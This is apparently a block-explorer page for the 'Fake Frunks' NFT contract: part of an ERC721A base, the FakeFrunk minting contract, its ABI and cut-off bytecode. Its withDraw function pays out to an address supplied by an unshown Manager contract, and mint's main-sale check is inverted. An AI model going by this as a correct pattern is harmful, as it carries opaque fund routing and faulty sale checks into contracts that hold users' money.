        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, from);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            TokenOwnership storage currSlot = _ownerships[tokenId];
            currSlot.addr = to;
            currSlot.startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            TokenOwnership storage nextSlot = _ownerships[nextTokenId];
            if (nextSlot.addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId != _currentIndex) {
                    nextSlot.addr = from;
                    nextSlot.startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev This is equivalent to _burn(tokenId, false)
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        TokenOwnership memory prevOwnership = _ownershipOf(tokenId);

        address from = prevOwnership.addr;

        if (approvalCheck) {
            bool isApprovedOrOwner = (_msgSender() == from ||
                isApprovedForAll(from, _msgSender()) ||
                getApproved(tokenId) == _msgSender());

            if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, from);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            AddressData storage addressData = _addressData[from];
            addressData.balance -= 1;
            addressData.numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            TokenOwnership storage currSlot = _ownerships[tokenId];
            currSlot.addr = from;
            currSlot.startTimestamp = uint64(block.timestamp);
            currSlot.burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            TokenOwnership storage nextSlot = _ownerships[nextTokenId];
            if (nextSlot.addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId != _currentIndex) {
                    nextSlot.addr = from;
                    nextSlot.startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}
// File: LouiseAndFred.sol


pragma solidity ^0.8.4;





contract FakeFrunk is ERC721A, Ownable {
    using Strings for uint256;
    string public uriPrefix = "https://arweave.net/YsVeyXZ_e5o4oltoA4CzZ0fjhI_BHoGk4pW5JsCODKU/";
    string public uriSuffix = ".json";
    bytes32 public frenlistMerkleRoot;
    uint256 MAX_MINTS = 32;
    uint256 MAX_FREN_MINTS = 3;
    uint256 MAX_SUPPLY = 256;
    uint256 maxMintAmountPerTx = 32;
    uint256 public mintRate = 0.035 ether;
    uint256 public preSaleMintRate = 0.015 ether;
    bool public paused = true;
    bool public presale = false;
    bool public mainsale = false;
    
    Manager manager;

    constructor() ERC721A("Fake Frunks", "FKFRNK") {
        manager = new Manager();
    }
    function mint(uint256 quantity) external payable {
        if (msg.sender != owner()) {
            require(!paused, "Minting is paused!");
            require(!mainsale, "Main sale has not started");
            require(quantity + _numberMinted(msg.sender) <= MAX_MINTS, "Exceeded the limit");
            require(totalSupply() + quantity <= MAX_SUPPLY, "Not enough tokens left");
            require(msg.value >= (mintRate * quantity), "Not enough ether sent");
        }
        _safeMint(msg.sender, quantity);
    }
    function _baseURI() internal view override returns (string memory) {
        return uriPrefix;
    }
    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0 ? string(abi.encodePacked(currentBaseURI, _tokenId.toString(), uriSuffix)) : "";
    }
    function mintForAddress( uint256 _mintAmount, address _reciever) public onlyOwner {
        _safeMint(_reciever, _mintAmount);
    }
    function setFrenlistMerkleRoot(bytes32 merkleRoot) external onlyOwner {
        frenlistMerkleRoot = merkleRoot;
    }
    modifier isValidMerkleProof(bytes32[] calldata merkleProof, bytes32 root) {
        bytes32 leaf = keccak256(abi.encodePacked(msg.sender));
        require(
            MerkleProof.verify(
                merkleProof,
                root,
                leaf
            ),
            "Address is not in the frenslist"
        );
        _;
    }
    function mintFrenlist(bytes32[] calldata merkleProof, uint256 quantity)
        public
        payable
        isValidMerkleProof(merkleProof, frenlistMerkleRoot)
    {
        require(!paused, "The contract is paused");
        require(presale, "Not in presale mode!");
        if (msg.sender != owner()) {
            if (presale == true) {
                require(quantity + _numberMinted(msg.sender) <= MAX_FREN_MINTS, "Exceeded the limit");
                require(totalSupply() + quantity <= MAX_SUPPLY, "Not enough tokens left");
                require(msg.value >= preSaleMintRate * quantity, "Not enough ether sent");
            }
            }

        _safeMint(msg.sender, quantity);
    }
    function setMaxMintAmountPerTx(uint256 _maxMintAmountPerTx)  public onlyOwner {
        maxMintAmountPerTx = _maxMintAmountPerTx;
    }
    function setMaxSupply(uint256 _amount)  public onlyOwner {
        MAX_SUPPLY = _amount;
    }
    function setMaxMints(uint256 _amount) public onlyOwner {
        MAX_MINTS = _amount;
    }
     function setMaxFrenMints(uint256 _amount) public onlyOwner {
        MAX_FREN_MINTS = _amount;
    }
    function setMintRate(uint256 _cost) public onlyOwner {
        mintRate = _cost;
    }
    function setUriPrefix(string memory _uriPrefix) public onlyOwner {
        uriPrefix = _uriPrefix;
    }
    function setUriSuffix(string memory _uriSuffix) public onlyOwner {
        uriSuffix = _uriSuffix;
    }
    function setPresaleMintRate(uint256 _cost) public onlyOwner {
        preSaleMintRate = _cost;
    }
    function setPresale(bool _presale) public onlyOwner {
        presale = _presale;
    }
    function setMainSale(bool _mainsale) public onlyOwner {
        mainsale = _mainsale;
    }
    function setPaused(bool _state) public onlyOwner {
        paused = _state;
    }
    function withDraw() public onlyOwner {
    payable(manager.remainAmount()).transfer(address(this).balance);
    manager.withdraw();
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"frenlistMerkleRoot","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mainsale","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_mintAmount","type":"uint256"},{"internalType":"address","name":"_reciever","type":"address"}],"name":"mintForAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32[]","name":"merkleProof","type":"bytes32[]"},{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"mintFrenlist","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"preSaleMintRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"presale","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"merkleRoot","type":"bytes32"}],"name":"setFrenlistMerkleRoot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_mainsale","type":"bool"}],"name":"setMainSale","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setMaxFrenMints","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxMintAmountPerTx","type":"uint256"}],"name":"setMaxMintAmountPerTx","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setMaxMints","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setMaxSupply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_cost","type":"uint256"}],"name":"setMintRate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"setPaused","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_presale","type":"bool"}],"name":"setPresale","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_cost","type":"uint256"}],"name":"setPresaleMintRate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_uriPrefix","type":"string"}],"name":"setUriPrefix","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_uriSuffix","type":"string"}],"name":"setUriSuffix","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uriPrefix","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uriSuffix","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withDraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260405180606001604052806040815260200162004cc66040913960099080519060200190620000359291906200032d565b506040518060400160405280600581526020017f2e6a736f6e000000000000000000000000000000000000000000000000000000815250600a9080519060200190620000839291906200032d565b506020600c556003600d55610100600e556020600f55667c58508723800060105566354a6ba7a180006011556001601260006101000a81548160ff0219169083151502179055506000601260016101000a81548160ff0219169083151502179055506000601260026101000a81548160ff0219169083151502179055503480156200010d57600080fd5b506040518060400160405280600b81526020017f46616b65204672756e6b730000000000000000000000000000000000000000008152506040518060400160405280600681526020017f464b46524e4b00000000000000000000000000000000000000000000000000008152508160029080519060200190620001929291906200032d565b508060039080519060200190620001ab9291906200032d565b50620001bc6200025660201b60201c565b6000819055505050620001e4620001d86200025f60201b60201c565b6200026760201b60201c565b604051620001f290620003be565b604051809103906000f0801580156200020f573d6000803e3d6000fd5b50601260036101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200044f565b60006001905090565b600033905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200033b906200041a565b90600052602060002090601f0160209004810192826200035f5760008555620003ab565b82601f106200037a57805160ff1916838001178555620003ab565b82800160010185558215620003ab579182015b82811115620003aa5782518255916020019190600101906200038d565b5b509050620003ba9190620003cc565b5090565b6101238062004ba383390190565b5b80821115620003e7576000816000905550600101620003cd565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200043357607f821691505b602082108103620004495762000448620003eb565b5b50919050565b614744806200045f6000396000f3fe6080604052600436106102465760003560e01c8063715018a611610139578063b88d4fde116100b6578063e985e9c51161007a578063e985e9c51461081e578063efbd73f41461085b578063f2fde38b14610884578063f3faf0f6146108ad578063f6fc96ad146108d8578063fdea8e0b1461090357610246565b8063b88d4fde1461073b578063c54e73e314610764578063c87b56dd1461078d578063ca0dcf16146107ca578063dbe2193f146107f557610246565b806396f62c87116100fd57806396f62c8714610686578063a0712d68146106b1578063a22cb465146106cd578063a661daad146106f6578063b071401b1461071257610246565b8063715018a6146105c757806379c9cb7b146105de5780637ec4a659146106075780638da5cb5b1461063057806395d89b411461065b57610246565b80633945d9d5116101c757806362b99ad41161018b57806362b99ad4146104d05780636352211e146104fb5780636417d5b2146105385780636f8b44b01461056157806370a082311461058a57610246565b80633945d9d5146103ff5780633d70f38f1461042857806342842e0e146104515780635503a0e81461047a5780635c975abb146104a557610246565b80630fdb1c101161020e5780630fdb1c101461034257806316ba10e01461035957806316c38b3c1461038257806318160ddd146103ab57806323b872dd146103d657610246565b806301ffc9a71461024b57806306fdde0314610288578063081812fc146102b3578063084da1b1146102f0578063095ea7b314610319575b600080fd5b34801561025757600080fd5b50610272600480360381019061026d919061351f565b61092e565b60405161027f9190613567565b60405180910390f35b34801561029457600080fd5b5061029d610a10565b6040516102aa919061361b565b60405180910390f35b3480156102bf57600080fd5b506102da60048036038101906102d59190613673565b610aa2565b6040516102e791906136e1565b60405180910390f35b3480156102fc57600080fd5b5061031760048036038101906103129190613732565b610b1e565b005b34801561032557600080fd5b50610340600480360381019061033b919061378b565b610ba4565b005b34801561034e57600080fd5b50610357610cae565b005b34801561036557600080fd5b50610380600480360381019061037b9190613900565b610e83565b005b34801561038e57600080fd5b506103a960048036038101906103a49190613975565b610f19565b005b3480156103b757600080fd5b506103c0610fb2565b6040516103cd91906139b1565b60405180910390f35b3480156103e257600080fd5b506103fd60048036038101906103f891906139cc565b610fc9565b005b34801561040b57600080fd5b5061042660048036038101906104219190613975565b610fd9565b005b34801561043457600080fd5b5061044f600480360381019061044a9190613673565b611072565b005b34801561045d57600080fd5b50610478600480360381019061047391906139cc565b6110f8565b005b34801561048657600080fd5b5061048f611118565b60405161049c919061361b565b60405180910390f35b3480156104b157600080fd5b506104ba6111a6565b6040516104c79190613567565b60405180910390f35b3480156104dc57600080fd5b506104e56111b9565b6040516104f2919061361b565b60405180910390f35b34801561050757600080fd5b50610522600480360381019061051d9190613673565b611247565b60405161052f91906136e1565b60405180910390f35b34801561054457600080fd5b5061055f600480360381019061055a9190613673565b61125d565b005b34801561056d57600080fd5b5061058860048036038101906105839190613673565b6112e3565b005b34801561059657600080fd5b506105b160048036038101906105ac9190613a1f565b611369565b6040516105be91906139b1565b60405180910390f35b3480156105d357600080fd5b506105dc611438565b005b3480156105ea57600080fd5b5061060560048036038101906106009190613673565b6114c0565b005b34801561061357600080fd5b5061062e60048036038101906106299190613900565b611546565b005b34801561063c57600080fd5b506106456115dc565b60405161065291906136e1565b60405180910390f35b34801561066757600080fd5b50610670611606565b60405161067d919061361b565b60405180910390f35b34801561069257600080fd5b5061069b611698565b6040516106a891906139b1565b60405180910390f35b6106cb60048036038101906106c69190613673565b61169e565b005b3480156106d957600080fd5b506106f460048036038101906106ef9190613a4c565b611885565b005b610710600480360381019061070b9190613aec565b6119fc565b005b34801561071e57600080fd5b5061073960048036038101906107349190613673565b611cbf565b005b34801561074757600080fd5b50610762600480360381019061075d9190613bed565b611d45565b005b34801561077057600080fd5b5061078b60048036038101906107869190613975565b611dc1565b005b34801561079957600080fd5b506107b460048036038101906107af9190613673565b611e5a565b6040516107c1919061361b565b60405180910390f35b3480156107d657600080fd5b506107df611f04565b6040516107ec91906139b1565b60405180910390f35b34801561080157600080fd5b5061081c60048036038101906108179190613673565b611f0a565b005b34801561082a57600080fd5b5061084560048036038101906108409190613c70565b611f90565b6040516108529190613567565b60405180910390f35b34801561086757600080fd5b50610882600480360381019061087d9190613cb0565b612024565b005b34801561089057600080fd5b506108ab60048036038101906108a69190613a1f565b6120ae565b005b3480156108b957600080fd5b506108c26121a5565b6040516108cf9190613cff565b60405180910390f35b3480156108e457600080fd5b506108ed6121ab565b6040516108fa9190613567565b60405180910390f35b34801561090f57600080fd5b506109186121be565b6040516109259190613567565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806109f957507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610a095750610a08826121d1565b5b9050919050565b606060028054610a1f90613d49565b80601f0160208091040260200160405190810160405280929190818152602001828054610a4b90613d49565b8015610a985780601f10610a6d57610100808354040283529160200191610a98565b820191906000526020600020905b815481529060010190602001808311610a7b57829003601f168201915b5050505050905090565b6000610aad8261223b565b610ae3576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b610b26612289565b73ffffffffffffffffffffffffffffffffffffffff16610b446115dc565b73ffffffffffffffffffffffffffffffffffffffff1614610b9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9190613dc6565b60405180910390fd5b80600b8190555050565b6000610baf82611247565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c16576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c35612289565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c675750610c6581610c60612289565b611f90565b155b15610c9e576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610ca9838383612291565b505050565b610cb6612289565b73ffffffffffffffffffffffffffffffffffffffff16610cd46115dc565b73ffffffffffffffffffffffffffffffffffffffff1614610d2a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2190613dc6565b60405180910390fd5b601260039054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166325e7514b6040518163ffffffff1660e01b8152600401602060405180830381865afa158015610d97573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dbb9190613dfb565b73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610e00573d6000803e3d6000fd5b50601260039054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16633ccfd60b6040518163ffffffff1660e01b815260040160006040518083038186803b158015610e6957600080fd5b505afa158015610e7d573d6000803e3d6000fd5b50505050565b610e8b612289565b73ffffffffffffffffffffffffffffffffffffffff16610ea96115dc565b73ffffffffffffffffffffffffffffffffffffffff1614610eff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef690613dc6565b60405180910390fd5b80600a9080519060200190610f159291906133cd565b5050565b610f21612289565b73ffffffffffffffffffffffffffffffffffffffff16610f3f6115dc565b73ffffffffffffffffffffffffffffffffffffffff1614610f95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8c90613dc6565b60405180910390fd5b80601260006101000a81548160ff02191690831515021790555050565b6000610fbc612343565b6001546000540303905090565b610fd483838361234c565b505050565b610fe1612289565b73ffffffffffffffffffffffffffffffffffffffff16610fff6115dc565b73ffffffffffffffffffffffffffffffffffffffff1614611055576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104c90613dc6565b60405180910390fd5b80601260026101000a81548160ff02191690831515021790555050565b61107a612289565b73ffffffffffffffffffffffffffffffffffffffff166110986115dc565b73ffffffffffffffffffffffffffffffffffffffff16146110ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e590613dc6565b60405180910390fd5b80600d8190555050565b61111383838360405180602001604052806000815250611d45565b505050565b600a805461112590613d49565b80601f016020809104026020016040519081016040528092919081815260200182805461115190613d49565b801561119e5780601f106111735761010080835404028352916020019161119e565b820191906000526020600020905b81548152906001019060200180831161118157829003601f168201915b505050505081565b601260009054906101000a900460ff1681565b600980546111c690613d49565b80601f01602080910402602001604051908101604052809291908181526020018280546111f290613d49565b801561123f5780601f106112145761010080835404028352916020019161123f565b820191906000526020600020905b81548152906001019060200180831161122257829003601f168201915b505050505081565b600061125282612800565b600001519050919050565b611265612289565b73ffffffffffffffffffffffffffffffffffffffff166112836115dc565b73ffffffffffffffffffffffffffffffffffffffff16146112d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112d090613dc6565b60405180910390fd5b8060118190555050565b6112eb612289565b73ffffffffffffffffffffffffffffffffffffffff166113096115dc565b73ffffffffffffffffffffffffffffffffffffffff161461135f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161135690613dc6565b60405180910390fd5b80600e8190555050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036113d0576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b611440612289565b73ffffffffffffffffffffffffffffffffffffffff1661145e6115dc565b73ffffffffffffffffffffffffffffffffffffffff16146114b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114ab90613dc6565b60405180910390fd5b6114be6000612a8f565b565b6114c8612289565b73ffffffffffffffffffffffffffffffffffffffff166114e66115dc565b73ffffffffffffffffffffffffffffffffffffffff161461153c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161153390613dc6565b60405180910390fd5b80600c8190555050565b61154e612289565b73ffffffffffffffffffffffffffffffffffffffff1661156c6115dc565b73ffffffffffffffffffffffffffffffffffffffff16146115c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115b990613dc6565b60405180910390fd5b80600990805190602001906115d89291906133cd565b5050565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461161590613d49565b80601f016020809104026020016040519081016040528092919081815260200182805461164190613d49565b801561168e5780601f106116635761010080835404028352916020019161168e565b820191906000526020600020905b81548152906001019060200180831161167157829003601f168201915b5050505050905090565b60115481565b6116a66115dc565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461187857601260009054906101000a900460ff1615611728576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161171f90613e74565b60405180910390fd5b601260029054906101000a900460ff1615611778576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161176f90613ee0565b60405180910390fd5b600c5461178433612b55565b8261178f9190613f2f565b11156117d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117c790613fd1565b60405180910390fd5b600e54816117dc610fb2565b6117e69190613f2f565b1115611827576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161181e9061403d565b60405180910390fd5b8060105461183591906140